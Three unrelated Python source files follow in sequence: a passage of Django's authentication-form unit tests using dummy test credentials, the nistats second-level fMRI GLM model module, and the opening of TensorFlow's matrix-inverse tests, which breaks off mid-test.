'username': 'jsmith',
'password1': 'test123',
'password2': 'test',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["password2"].errors,
[force_text(form.error_messages['password_mismatch'])])
def test_both_passwords(self):
# One (or both) passwords weren't given
data = {'username': 'jsmith'}
form = UserCreationForm(data)
required_error = [force_text(Field.default_error_messages['required'])]
self.assertFalse(form.is_valid())
self.assertEqual(form['password1'].errors, required_error)
self.assertEqual(form['password2'].errors, required_error)
data['password2'] = 'test123'
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['password1'].errors, required_error)
self.assertEqual(form['password2'].errors, [])
@mock.patch('django.contrib.auth.password_validation.password_changed')
def test_success(self, password_changed):
# The success case.
data = {
'username': 'jsmith@example.com',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertTrue(form.is_valid())
form.save(commit=False)
self.assertEqual(password_changed.call_count, 0)
u = form.save()
self.assertEqual(password_changed.call_count, 1)
self.assertEqual(repr(u), '<User: jsmith@example.com>')
@override_settings(AUTH_PASSWORD_VALIDATORS=[
{'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'},
{'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', 'OPTIONS': {
'min_length': 12,
}},
])
def test_validates_password(self):
data = {
'username': 'testclient',
'password1': 'testclient',
'password2': 'testclient',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(len(form['password2'].errors), 2)
self.assertIn('The password is too similar to the username.', form['password2'].errors)
self.assertIn(
'This password is too short. It must contain at least 12 characters.',
form['password2'].errors
)
@override_settings(USE_TZ=False, PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'])
class AuthenticationFormTest(TestDataMixin, TestCase):
def test_invalid_username(self):
# The user submits an invalid username.
data = {
'username': 'jsmith_does_not_exist',
'password': 'test123',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(),
[force_text(form.error_messages['invalid_login'] % {
'username': User._meta.get_field('username').verbose_name
})])
def test_inactive_user(self):
# The user is inactive.
data = {
'username': 'inactive',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(),
[force_text(form.error_messages['inactive'])])
def test_inactive_user_i18n(self):
with self.settings(USE_I18N=True), translation.override('pt-br', deactivate=True):
# The user is inactive.
data = {
'username': 'inactive',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(),
[force_text(form.error_messages['inactive'])])
def test_custom_login_allowed_policy(self):
# The user is inactive, but our custom form policy allows them to log in.
data = {
'username': 'inactive',
'password': 'password',
}
class AuthenticationFormWithInactiveUsersOkay(AuthenticationForm):
def confirm_login_allowed(self, user):
pass
form = AuthenticationFormWithInactiveUsersOkay(None, data)
self.assertTrue(form.is_valid())
# If we want to disallow some logins according to custom logic,
# we should raise a django.forms.ValidationError in the form.
class PickyAuthenticationForm(AuthenticationForm):
def confirm_login_allowed(self, user):
if user.username == "inactive":
raise forms.ValidationError("This user is disallowed.")
raise forms.ValidationError("Sorry, nobody's allowed in.")
form = PickyAuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(), ['This user is disallowed.'])
data = {
'username': 'testclient',
'password': 'password',
}
form = PickyAuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(), ["Sorry, nobody's allowed in."])
def test_success(self):
# The success case
data = {
'username': 'testclient',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.non_field_errors(), [])
def test_username_field_label(self):
class CustomAuthenticationForm(AuthenticationForm):
username = CharField(label="Name", max_length=75)
form = CustomAuthenticationForm()
self.assertEqual(form['username'].label, "Name")
def test_username_field_label_not_set(self):
class CustomAuthenticationForm(AuthenticationForm):
username = CharField()
form = CustomAuthenticationForm()
username_field = User._meta.get_field(User.USERNAME_FIELD)
self.assertEqual(form.fields['username'].label, capfirst(username_field.verbose_name))
def test_username_field_label_empty_string(self):
class CustomAuthenticationForm(AuthenticationForm):
username = CharField(label='')
form = CustomAuthenticationForm()
self.assertEqual(form.fields['username'].label, "")
@override_settings(USE_TZ=False, PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'])
class SetPasswordFormTest(TestDataMixin, TestCase):
def test_password_verification(self):
# The two new passwords do not match.
user = User.objects.get(username='testclient')
data = {
'new_password1': 'abc123',
'new_password2': 'abc',
}
form = SetPasswordForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["new_password2"].errors,
[force_text(form.error_messages['password_mismatch'])])
@mock.patch('django.contrib.auth.password_validation.password_changed')
def test_success(self, password_changed):
user = User.objects.get(username='testclient')
data = {
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = SetPasswordForm(user, data)
self.assertTrue(form.is_valid())
form.save(commit=False)
self.assertEqual(password_changed.call_count, 0)
form.save()
self.assertEqual(password_changed.call_count, 1)
@override_settings(AUTH_PASSWORD_VALIDATORS=[
{'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'},
{'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', 'OPTIONS': {
'min_length': 12,
}},
])
def test_validates_password(self):
user = User.objects.get(username='testclient')
data = {
'new_password1': 'testclient',
'new_password2': 'testclient',
}
form = SetPasswordForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(len(form["new_password2"].errors), 2)
self.assertIn('The password is too similar to the username.', form["new_password2"].errors)
self.assertIn(
'This password is too short. It must contain at least 12 characters.',
form["new_password2"].errors
)
@override_settings(USE_TZ=False, PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'])
class PasswordChangeFormTest(TestDataMixin, TestCase):
def test_incorrect_password(self):
user = User.objects.get(username='testclient')
data = {
'old_password': 'test',
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = PasswordChangeForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["old_password"].errors,
[force_text(form.error_messages['password_incorrect'])])
def test_password_verification(self):
# The two new passwords do not match.
user = User.objects.get(username='testclient')
data = {
'old_password': 'password',
'new_password1': 'abc123',
'new_password2': 'abc',
}
form = PasswordChangeForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["new_password2"].errors,
[force_text(form.error_messages['password_mismatch'])])
@mock.patch('django.contrib.auth.password_validation.password_changed')
def test_success(self, password_changed):
# The success case.
user = User.objects.get(username='testclient')
data = {
'old_password': 'password',
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = PasswordChangeForm(user, data)
self.assertTrue(form.is_valid())
form.save(commit=False)
self.assertEqual(password_changed.call_count, 0)
form.save()
self.assertEqual(password_changed.call_count, 1)
def test_field_order(self):
# Regression test - check the order of fields:
user = User.objects.get(username='testclient')
self.assertEqual(list(PasswordChangeForm(user, {}).fields),
['old_password', 'new_password1', 'new_password2'])
@override_settings(USE_TZ=False, PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'])
class UserChangeFormTest(TestDataMixin, TestCase):
def test_username_validity(self):
user = User.objects.get(username='testclient')
data = {'username': 'not valid'}
form = UserChangeForm(data, instance=user)
self.assertFalse(form.is_valid())
validator = next(v for v in User._meta.get_field('username').validators if v.code == 'invalid')
self.assertEqual(form["username"].errors, [force_text(validator.message)])
def test_bug_14242(self):
# A regression test, introduce by adding an optimization for the
# UserChangeForm.
class MyUserForm(UserChangeForm):
def __init__(self, *args, **kwargs):
super(MyUserForm, self).__init__(*args, **kwargs)
self.fields['groups'].help_text = 'These groups give users different permissions'
class Meta(UserChangeForm.Meta):
fields = ('groups',)
# Just check we can create it
MyUserForm({})
def test_unsuable_password(self):
user = User.objects.get(username='empty_password')
user.set_unusable_password()
user.save()
form = UserChangeForm(instance=user)
self.assertIn(_("No password set."), form.as_table())
def test_bug_17944_empty_password(self):
user = User.objects.get(username='empty_password')
form = UserChangeForm(instance=user)
self.assertIn(_("No password set."), form.as_table())
def test_bug_17944_unmanageable_password(self):
user = User.objects.get(username='unmanageable_password')
form = UserChangeForm(instance=user)
self.assertIn(_("Invalid password format or unknown hashing algorithm."),
form.as_table())
def test_bug_17944_unknown_password_algorithm(self):
user = User.objects.get(username='unknown_password')
form = UserChangeForm(instance=user)
self.assertIn(_("Invalid password format or unknown hashing algorithm."),
form.as_table())
def test_bug_19133(self):
"The change form does not return the password value"
# Use the form to construct the POST data
user = User.objects.get(username='testclient')
form_for_data = UserChangeForm(instance=user)
post_data = form_for_data.initial
# The password field should be readonly, so anything
# posted here should be ignored; the form will be
# valid, and give back the 'initial' value for the
# password field.
post_data['password'] = 'new password'
form = UserChangeForm(instance=user, data=post_data)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['password'], 'sha1$6efc0$f93efe9fd7542f25a7be94871ea45aa95de57161')
def test_bug_19349_bound_password_field(self):
user = User.objects.get(username='testclient')
form = UserChangeForm(data={}, instance=user)
# When rendering the bound password field,
# ReadOnlyPasswordHashWidget needs the initial
# value to render correctly
self.assertEqual(form.initial['password'], form['password'].value())
@override_settings(
PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
TEMPLATES=AUTH_TEMPLATES,
USE_TZ=False,
)
class PasswordResetFormTest(TestDataMixin, TestCase):
@classmethod
def setUpClass(cls):
super(PasswordResetFormTest, cls).setUpClass()
# This cleanup is necessary because contrib.sites cache
# makes tests interfere with each other, see #11505
Site.objects.clear_cache()
def create_dummy_user(self):
"""
Create a user and return a tuple (user_object, username, email).
"""
username = 'jsmith'
email = 'jsmith@example.com'
user = User.objects.create_user(username, email, 'test123')
return (user, username, email)
def test_invalid_email(self):
data = {'email': 'not valid'}
form = PasswordResetForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['email'].errors, [_('Enter a valid email address.')])
def test_nonexistent_email(self):
"""
Test nonexistent email address. This should not fail because it would
expose information about registered users.
"""
data = {'email': 'foo@bar.com'}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
self.assertEqual(len(mail.outbox), 0)
def test_cleaned_data(self):
(user, username, email) = self.create_dummy_user()
data = {'email': email}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
form.save(domain_override='example.com')
self.assertEqual(form.cleaned_data['email'], email)
self.assertEqual(len(mail.outbox), 1)
def test_custom_email_subject(self):
data = {'email': 'testclient@example.com'}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
# Since we're not providing a request object, we must provide a
# domain_override to prevent the save operation from failing in the
# potential case where contrib.sites is not installed. Refs #16412.
form.save(domain_override='example.com')
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, 'Custom password reset on example.com')
def test_custom_email_constructor(self):
data = {'email': 'testclient@example.com'}
class CustomEmailPasswordResetForm(PasswordResetForm):
def send_mail(self, subject_template_name, email_template_name,
context, from_email, to_email,
html_email_template_name=None):
EmailMultiAlternatives(
"Forgot your password?",
"Sorry to hear you forgot your password.",
None, [to_email],
['site_monitor@example.com'],
headers={'Reply-To': 'webmaster@example.com'},
alternatives=[("Really sorry to hear you forgot your password.",
"text/html")]).send()
form = CustomEmailPasswordResetForm(data)
self.assertTrue(form.is_valid())
# Since we're not providing a request object, we must provide a
# domain_override to prevent the save operation from failing in the
# potential case where contrib.sites is not installed. Refs #16412.
form.save(domain_override='example.com')
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, 'Forgot your password?')
self.assertEqual(mail.outbox[0].bcc, ['site_monitor@example.com'])
self.assertEqual(mail.outbox[0].content_subtype, "plain")
def test_preserve_username_case(self):
"""
Preserve the case of the user name (before the @ in the email address)
when creating a user (#5605).
"""
user = User.objects.create_user('forms_test2', 'tesT@EXAMple.com', 'test')
self.assertEqual(user.email, 'tesT@example.com')
user = User.objects.create_user('forms_test3', 'tesT', 'test')
self.assertEqual(user.email, 'tesT')
def test_inactive_user(self):
"""
Test that inactive user cannot receive password reset email.
"""
(user, username, email) = self.create_dummy_user()
user.is_active = False
user.save()
form = PasswordResetForm({'email': email})
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(len(mail.outbox), 0)
def test_unusable_password(self):
user = User.objects.create_user('testuser', 'test@example.com', 'test')
data = {"email": "test@example.com"}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
user.set_unusable_password()
user.save()
form = PasswordResetForm(data)
# The form itself is valid, but no email is sent
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(len(mail.outbox), 0)
def test_save_plaintext_email(self):
"""
Test the PasswordResetForm.save() method with no html_email_template_name
parameter passed in.
Test to ensure original behavior is unchanged after the parameter was added.
"""
(user, username, email) = self.create_dummy_user()
form = PasswordResetForm({"email": email})
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0].message()
self.assertFalse(message.is_multipart())
self.assertEqual(message.get_content_type(), 'text/plain')
self.assertEqual(message.get('subject'), 'Custom password reset on example.com')
self.assertEqual(len(mail.outbox[0].alternatives), 0)
self.assertEqual(message.get_all('to'), [email])
self.assertTrue(re.match(r'^http://example.com/reset/[\w+/-]', message.get_payload()))
def test_save_html_email_template_name(self):
"""
Test the PasswordResetFOrm.save() method with html_email_template_name
parameter specified.
Test to ensure that a multipart email is sent with both text/plain
and text/html parts.
"""
(user, username, email) = self.create_dummy_user()
form = PasswordResetForm({"email": email})
self.assertTrue(form.is_valid())
form.save(html_email_template_name='registration/html_password_reset_email.html')
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(len(mail.outbox[0].alternatives), 1)
message = mail.outbox[0].message()
self.assertEqual(message.get('subject'), 'Custom password reset on example.com')
self.assertEqual(len(message.get_payload()), 2)
self.assertTrue(message.is_multipart())
self.assertEqual(message.get_payload(0).get_content_type(), 'text/plain')
self.assertEqual(message.get_payload(1).get_content_type(), 'text/html')
self.assertEqual(message.get_all('to'), [email])
self.assertTrue(re.match(r'^http://example.com/reset/[\w/-]+', message.get_payload(0).get_payload()))
self.assertTrue(
re.match(r'^<html><a href="http://example.com/reset/[\w/-]+/">Link</a></html>$',
message.get_payload(1).get_payload())
)
class ReadOnlyPasswordHashTest(SimpleTestCase):
def test_bug_19349_render_with_none_value(self):
# Rendering the widget with value set to None
# mustn't raise an exception.
widget = ReadOnlyPasswordHashWidget()
html = widget.render(name='password', value=None, attrs={})
self.assertIn(_("No password set."), html)
def test_readonly_field_has_changed(self):
field = ReadOnlyPasswordHashField()
self.assertFalse(field.has_changed('aaa', 'bbb'))
@override_settings(USE_TZ=False, PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'])
class AdminPasswordChangeFormTest(TestDataMixin, TestCase):
@mock.patch('django.contrib.auth.password_validation.password_changed')
def test_success(self, password_changed):
user = User.objects.get(username='testclient')
data = {
'password1': 'test123',
'password2': 'test123',
}
form = AdminPasswordChangeForm(user, data)
self.assertTrue(form.is_valid())
form.save(commit=False)
self.assertEqual(password_changed.call_count, 0)
form.save()
self.assertEqual(password_changed.call_count, 1)
|
|
"""
This module presents an interface to use the glm implemented in
nistats.regression.
It provides facilities to realize a second level analysis on lists of
first level contrasts or directly on fitted first level models
Author: Martin Perez-Guevara, 2016
"""
import sys
import time
from warnings import warn
import pandas as pd
import numpy as np
from nibabel import Nifti1Image
from nilearn._utils.niimg_conversions import check_niimg
from nilearn._utils import CacheMixin
from nilearn.input_data import NiftiMasker
from nilearn.image import mean_img
from patsy import DesignInfo
from sklearn.base import BaseEstimator, TransformerMixin, clone
from sklearn.externals.joblib import Memory
from .first_level_model import FirstLevelModel
from .first_level_model import run_glm
from .regression import SimpleRegressionResults
from .contrasts import compute_contrast
from .utils import _basestring
from .design_matrix import make_second_level_design_matrix
from nistats._utils.helpers import replace_parameters
def _infer_effect_maps(second_level_input, contrast_def):
"""Deals with the different possibilities of second_level_input"""
# Build the design matrix X and list of imgs Y for GLM fit
if isinstance(second_level_input, pd.DataFrame):
# If a Dataframe was given, we expect contrast_def to be in map_name
def _is_contrast_def(x):
return x['map_name'] == contrast_def
is_con = second_level_input.apply(_is_contrast_def, axis=1)
effect_maps = second_level_input[is_con]['effects_map_path'].tolist()
elif isinstance(second_level_input[0], FirstLevelModel):
# Get the first level model maps
effect_maps = []
for model in second_level_input:
effect_map = model.compute_contrast(contrast_def,
output_type='effect_size')
effect_maps.append(effect_map)
else:
effect_maps = second_level_input
# check niimgs
for niimg in effect_maps:
check_niimg(niimg, ensure_ndim=3)
return effect_maps
class SecondLevelModel(BaseEstimator, TransformerMixin, CacheMixin):
""" Implementation of the General Linear Model for multiple subject
fMRI data
Parameters
----------
mask_img: Niimg-like, NiftiMasker or MultiNiftiMasker object, optional,
Mask to be used on data. If an instance of masker is passed,
then its mask will be used. If no mask is given,
it will be computed automatically by a MultiNiftiMasker with default
parameters. Automatic mask computation assumes first level imgs have
already been masked.
smoothing_fwhm: float, optional
If smoothing_fwhm is not None, it gives the size in millimeters of the
spatial smoothing to apply to the signal.
memory: string, optional
Path to the directory used to cache the masking process and the glm
fit. By default, no caching is done. Creates instance of joblib.Memory.
memory_level: integer, optional
Rough estimator of the amount of memory used by caching. Higher value
means more memory for caching.
verbose : integer, optional
Indicate the level of verbosity. By default, nothing is printed.
If 0 prints nothing. If 1 prints final computation time.
If 2 prints masker computation details.
n_jobs : integer, optional
The number of CPUs to use to do the computation. -1 means
'all CPUs', -2 'all CPUs but one', and so on.
minimize_memory : boolean, optional
Gets rid of some variables on the model fit results that are not
necessary for contrast computation and would only be useful for
further inspection of model details. This has an important impact
on memory consumption. True by default.
"""
@replace_parameters({'mask': 'mask_img'}, end_version='next')
def __init__(self, mask_img=None, smoothing_fwhm=None,
memory=Memory(None), memory_level=1, verbose=0,
n_jobs=1, minimize_memory=True):
self.mask_img = mask_img
self.smoothing_fwhm = smoothing_fwhm
if isinstance(memory, _basestring):
self.memory = Memory(memory)
else:
self.memory = memory
self.memory_level = memory_level
self.verbose = verbose
self.n_jobs = n_jobs
self.minimize_memory = minimize_memory
self.second_level_input_ = None
self.confounds_ = None
def fit(self, second_level_input, confounds=None, design_matrix=None):
""" Fit the second-level GLM
1. create design matrix
2. do a masker job: fMRI_data -> Y
3. fit regression to (Y, X)
Parameters
----------
second_level_input: list of `FirstLevelModel` objects or pandas
DataFrame or list of Niimg-like objects.
Giving FirstLevelModel objects will allow to easily compute
the second level contast of arbitrary first level contrasts thanks
to the first_level_contrast argument of the compute_contrast
method. Effect size images will be computed for each model to
contrast at the second level.
If a pandas DataFrame, then they have to contain subject_label,
map_name and effects_map_path. It can contain multiple maps that
would be selected during contrast estimation with the argument
first_level_contrast of the compute_contrast function. The
DataFrame will be sorted based on the subject_label column to avoid
order inconsistencies when extracting the maps. So the rows of the
automatically computed design matrix, if not provided, will
correspond to the sorted subject_label column.
If list of Niimg-like objects then this is taken literally as Y
for the model fit and design_matrix must be provided.
confounds: pandas DataFrame, optional
Must contain a subject_label column. All other columns are
considered as confounds and included in the model. If
design_matrix is provided then this argument is ignored.
The resulting second level design matrix uses the same column
names as in the given DataFrame for confounds. At least two columns
are expected, "subject_label" and at least one confound.
design_matrix: pandas DataFrame, optional
Design matrix to fit the GLM. The number of rows
in the design matrix must agree with the number of maps derived
from second_level_input.
Ensure that the order of maps given by a second_level_input
list of Niimgs matches the order of the rows in the design matrix.
"""
# Check parameters
# check first level input
if isinstance(second_level_input, list):
if len(second_level_input) < 2:
raise ValueError('A second level model requires a list with at'
'least two first level models or niimgs')
# Check FirstLevelModel objects case
if isinstance(second_level_input[0], FirstLevelModel):
models_input = enumerate(second_level_input)
for model_idx, first_level_model in models_input:
if (first_level_model.labels_ is None or
first_level_model.results_ is None):
raise ValueError(
'Model %s at index %i has not been fit yet'
'' % (first_level_model.subject_label, model_idx))
if not isinstance(first_level_model, FirstLevelModel):
raise ValueError(' object at idx %d is %s instead of'
' FirstLevelModel object' %
(model_idx, type(first_level_model)))
if confounds is not None:
if first_level_model.subject_label is None:
raise ValueError(
'In case confounds are provided, first level '
'objects need to provide the attribute '
'subject_label to match rows appropriately.'
'Model at idx %d does not provide it. '
'To set it, you can do '
'first_level_model.subject_label = "01"'
'' % (model_idx))
# Check niimgs case
elif isinstance(second_level_input[0], (str, Nifti1Image)):
if design_matrix is None:
raise ValueError('List of niimgs as second_level_input'
' require a design matrix to be provided')
for model_idx, niimg in enumerate(second_level_input):
if not isinstance(niimg, (str, Nifti1Image)):
raise ValueError(' object at idx %d is %s instead of'
' Niimg-like object' %
(model_idx, type(niimg)))
# Check pandas dataframe case
elif isinstance(second_level_input, pd.DataFrame):
for col in ['subject_label', 'map_name', 'effects_map_path']:
if col not in second_level_input.columns:
raise ValueError('second_level_input DataFrame must have'
' columns subject_label, map_name and'
' effects_map_path')
# Make sure subject_label contain strings
second_level_columns = second_level_input.columns.tolist()
labels_index = second_level_columns.index('subject_label')
labels_dtype = second_level_input.dtypes[labels_index]
if not isinstance(labels_dtype, np.object):
raise ValueError('subject_label column must be of dtype '
'object instead of dtype %s' % labels_dtype)
elif isinstance(second_level_input, (str, Nifti1Image)):
if design_matrix is None:
raise ValueError('List of niimgs as second_level_input'
' require a design matrix to be provided')
second_level_input = check_niimg(niimg=second_level_input,
ensure_ndim=4)
else:
raise ValueError('second_level_input must be a list of'
' `FirstLevelModel` objects, a pandas DataFrame'
' or a list Niimg-like objects. Instead %s '
'was provided' % type(second_level_input))
# check confounds
if confounds is not None:
if not isinstance(confounds, pd.DataFrame):
raise ValueError('confounds must be a pandas DataFrame')
if 'subject_label' not in confounds.columns:
raise ValueError('confounds DataFrame must contain column'
'"subject_label"')
if len(confounds.columns) < 2:
raise ValueError('confounds should contain at least 2 columns'
'one called "subject_label" and the other'
'with a given confound')
# Make sure subject_label contain strings
labels_index = confounds.columns.tolist().index('subject_label')
labels_dtype = confounds.dtypes[labels_index]
if not isinstance(labels_dtype, np.object):
raise ValueError('subject_label column must be of dtype '
'object instead of dtype %s' % labels_dtype)
# check design matrix
if design_matrix is not None:
if not isinstance(design_matrix, pd.DataFrame):
raise ValueError('design matrix must be a pandas DataFrame')
# sort a pandas dataframe by subject_label to avoid inconsistencies
# with the design matrix row order when automatically extracting maps
if isinstance(second_level_input, pd.DataFrame):
columns = second_level_input.columns.tolist()
column_index = columns.index('subject_label')
sorted_matrix = sorted(
second_level_input.values, key=lambda x: x[column_index])
sorted_input = pd.DataFrame(sorted_matrix, columns=columns)
second_level_input = sorted_input
self.second_level_input_ = second_level_input
self.confounds_ = confounds
# Report progress
t0 = time.time()
if self.verbose > 0:
sys.stderr.write("Fitting second level model. "
"Take a deep breath\r")
# Select sample map for masker fit and get subjects_label for design
if isinstance(second_level_input, pd.DataFrame):
sample_map = second_level_input['effects_map_path'][0]
labels = second_level_input['subject_label']
subjects_label = labels.values.tolist()
elif isinstance(second_level_input, Nifti1Image):
sample_map = mean_img(second_level_input)
elif isinstance(second_level_input[0], FirstLevelModel):
sample_model = second_level_input[0]
sample_condition = sample_model.design_matrices_[0].columns[0]
sample_map = sample_model.compute_contrast(
sample_condition, output_type='effect_size')
labels = [model.subject_label for model in second_level_input]
subjects_label = labels
else:
# In this case design matrix had to be provided
sample_map = mean_img(second_level_input)
# Create and set design matrix, if not given
if design_matrix is None:
design_matrix = make_second_level_design_matrix(subjects_label,
confounds)
self.design_matrix_ = design_matrix
# Learn the mask. Assume the first level imgs have been masked.
if not isinstance(self.mask_img, NiftiMasker):
self.masker_ = NiftiMasker(
mask_img=self.mask_img, smoothing_fwhm=self.smoothing_fwhm,
memory=self.memory, verbose=max(0, self.verbose - 1),
memory_level=self.memory_level)
else:
self.masker_ = clone(self.mask_img)
for param_name in ['smoothing_fwhm', 'memory', 'memory_level']:
our_param = getattr(self, param_name)
if our_param is None:
continue
if getattr(self.masker_, param_name) is not None:
warn('Parameter %s of the masker overriden' % param_name)
setattr(self.masker_, param_name, our_param)
self.masker_.fit(sample_map)
# Report progress
if self.verbose > 0:
sys.stderr.write("\nComputation of second level model done in "
"%i seconds\n" % (time.time() - t0))
return self
def compute_contrast(
self, second_level_contrast=None, first_level_contrast=None,
second_level_stat_type=None, output_type='z_score'):
"""Generate different outputs corresponding to
the contrasts provided e.g. z_map, t_map, effects and variance.
Parameters
----------
second_level_contrast: str or array of shape (n_col), optional
Where ``n_col`` is the number of columns of the design matrix,
The string can be a formula compatible with the linear constraint
of the Patsy library. Basically one can use the name of the
conditions as they appear in the design matrix of
the fitted model combined with operators /\*+- and numbers.
Please check the patsy documentation for formula examples:
http://patsy.readthedocs.io/en/latest/API-reference.html#patsy.DesignInfo.linear_constraint
The default (None) is accepted if the design matrix has a single
column, in which case the only possible contrast array([1]) is
applied; when the design matrix has multiple columns, an error is
raised.
first_level_contrast: str or array of shape (n_col) with respect to
FirstLevelModel, optional
In case a list of FirstLevelModel was provided as
second_level_input, we have to provide a contrast to apply to
the first level models to get the corresponding list of images
desired, that would be tested at the second level. In case a
pandas DataFrame was provided as second_level_input this is the
map name to extract from the pandas dataframe map_name column.
It has to be a 't' contrast.
second_level_stat_type: {'t', 'F'}, optional
Type of the second level contrast
output_type: str, optional
Type of the output map. Can be 'z_score', 'stat', 'p_value',
'effect_size' or 'effect_variance'
Returns
-------
output_image: Nifti1Image
The desired output image
"""
if self.second_level_input_ is None:
raise ValueError('The model has not been fit yet')
# first_level_contrast check
if isinstance(self.second_level_input_[0], FirstLevelModel):
if first_level_contrast is None:
raise ValueError('If second_level_input was a list of '
'FirstLevelModel, then first_level_contrast '
'is mandatory. It corresponds to the '
'second_level_contrast argument of the '
'compute_contrast method of FirstLevelModel')
# check contrast definition
if second_level_contrast is None:
if self.design_matrix_.shape[1] == 1:
second_level_contrast = np.ones([1])
else:
raise ValueError('No second-level contrast is specified.')
if isinstance(second_level_contrast, np.ndarray):
con_val = second_level_contrast
if np.all(con_val == 0):
raise ValueError('Contrast is null')
else:
design_info = DesignInfo(self.design_matrix_.columns.tolist())
constraint = design_info.linear_constraint(second_level_contrast)
con_val = constraint.coefs
# check output type
if isinstance(output_type, _basestring):
if output_type not in ['z_score', 'stat', 'p_value', 'effect_size',
'effect_variance']:
raise ValueError(
'output_type must be one of "z_score", "stat"'
', "p_value", "effect_size" or "effect_variance"')
else:
raise ValueError('output_type must be one of "z_score", "stat",'
' "p_value", "effect_size" or "effect_variance"')
# Get effect_maps appropriate for chosen contrast
effect_maps = _infer_effect_maps(self.second_level_input_,
first_level_contrast)
# Check design matrix X and effect maps Y agree on number of rows
if len(effect_maps) != self.design_matrix_.shape[0]:
raise ValueError(
'design_matrix does not match the number of maps considered. '
'%i rows in design matrix do not match with %i maps' %
(self.design_matrix_.shape[0], len(effect_maps)))
# Fit an Ordinary Least Squares regression for parametric statistics
Y = self.masker_.transform(effect_maps)
if self.memory:
mem_glm = self.memory.cache(run_glm, ignore=['n_jobs'])
else:
mem_glm = run_glm
labels, results = mem_glm(Y, self.design_matrix_.values,
n_jobs=self.n_jobs, noise_model='ols')
# We save memory if inspecting model details is not necessary
if self.minimize_memory:
for key in results:
results[key] = SimpleRegressionResults(results[key])
self.labels_ = labels
self.results_ = results
# We compute contrast object
if self.memory:
mem_contrast = self.memory.cache(compute_contrast)
else:
mem_contrast = compute_contrast
contrast = mem_contrast(self.labels_, self.results_, con_val,
second_level_stat_type)
# We get desired output from contrast object
estimate_ = getattr(contrast, output_type)()
# Prepare the returned images
output = self.masker_.inverse_transform(estimate_)
contrast_name = str(con_val)
output.header['descrip'] = (
'%s of contrast %s' % (output_type, contrast_name))
return output
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.math_ops.matrix_inverse."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import benchmark
from tensorflow.python.platform import test
class InverseOpTest(test.TestCase):
def _verifyInverse(self, x, np_type):
for adjoint in False, True:
y = x.astype(np_type)
with self.cached_session(use_gpu=True):
# Verify that x^{-1} * x == Identity matrix.
inv = linalg_ops.matrix_inverse(y, adjoint=adjoint)
tf_ans = test_util.matmul_without_tf32(inv, y, adjoint_b=adjoint)
np_ans = np.identity(y.shape[-1])
if x.ndim > 2:
tiling = list(y.shape)
tiling[-2:] = [1, 1]
np_ans = np.tile(np_ans, tiling)
out = self.evaluate(tf_ans)
self.assertAllClose(np_ans, out, rtol=1e-4, atol=1e-3)
self.assertShapeEqual(y, tf_ans)
def _verifyInverseReal(self, x):
for np_type in [np.float32, np.float64]:
self._verifyInverse(x, np_type)
def _verifyInverseComplex(self, x):
for np_type in [np.complex64, np.complex128]:
self._verifyInverse(x, np_type)
def _makeBatch(self, matrix1, matrix2):
matrix_batch = np.concatenate(
[np.expand_dims(matrix1, 0),
np.expand_dims(matrix2, 0)])
matrix_batch = np.tile(matrix_batch, [2, 3, 1, 1])
return matrix_batch
def testNonsymmetric(self):
# 2x2 matrices
matrix1 = np.array([[1., 2.], [3., 4.]])
